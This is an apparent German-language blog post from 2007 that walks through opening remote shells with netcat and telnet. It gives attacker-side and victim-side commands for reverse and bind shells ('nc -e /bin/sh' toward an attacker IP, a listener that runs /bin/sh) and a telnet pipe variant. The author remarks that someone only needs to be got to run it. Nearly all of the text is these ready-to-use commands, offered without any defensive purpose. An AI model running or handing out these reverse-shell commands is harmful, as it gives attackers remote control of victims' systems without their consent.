Remote-Shell

Posted by eddy14 - 12/08/07 at 01:08 pm

Hallo Leute,

Hab letztens ein bisschen mit netcat herumexperimentiert , und musste folgendes selber herausprobieren, weil ich kein passendes Paper fand, welches genau das erklärt hat :P
Man müsste es nur schaffen, irgendeinen das ausführen zu lassen ^^

——————————————————-

| — Reverse Connection: — |
Angreiffer:
nc -l -p 5110
EINEN SERVER AUF PORT 5110 STARTEN

Opfer:
nc -e /bin/sh 127.0.0.1 5110
EINEN CLIENTEN ZUM SERVER 127.0.0.1 (ANGREIFFER IP) AUF PORT 5110 VERBINDEN LASSEN, UND SHELL AUSFÜHREN (REMOTE SHELL)

| — Direct Connection: — |
Angreiffer:
nc 127.0.0.1 5110
EINEN CLIENTEN ZUM SERVER 127.0.0.1 (OPFER IP) AUF PORT 5110 VERBINDEN LASSEN

Opfer:
nc -l -p 5110 -e /bin/sh
EINEN SERVER STARTEN, DER NACH VERBINDUNGAUFBAU EINE SHELL STARTET (REMOTE SHELL)

————————————————–

Vielleicht brauchts ja einer :P

//edit:
Hab nochmal weiter experimentiert (weil ich Pipes so liebe xD) habe ich mir noch was mit Pipes überlegt. Und zwar nutze ich telnet dazu :P
Opfer macht folgendes:
telnet “127.0.0.1″ 50 | /bin/sh | telnet “127.0.0.1″ 51
Der “Hacker” hat dann einfach 2 Konsolen offen, mit folgendem:
sudo nc -l -p 50
sudo nc -l -p 51
Mit dem ersten werden die Kommandos geschickt, und das andere erhält die Rückgabe :P
Weiß vielleicht einer Zufällig, wie ich es verhindern kann dass ich 2 Ports öffnen muss? Also, dass die Rückgabe von Bash wieder zum gleichen Port Zurückgeschickt wird?
Sowas wie:
telnet “127.0.0.1″ 50 | /bin/sh | $1
und dieses “$1″ würde z.B. “telnet “127.0.0.1″ 50″ symbolisieren xD Kp irgendwie sowas.

If you enjoyed this article please consider staying updated via RSS. Links to your own social media pages could be added here.

Leave a Reply

I would love to hear your view.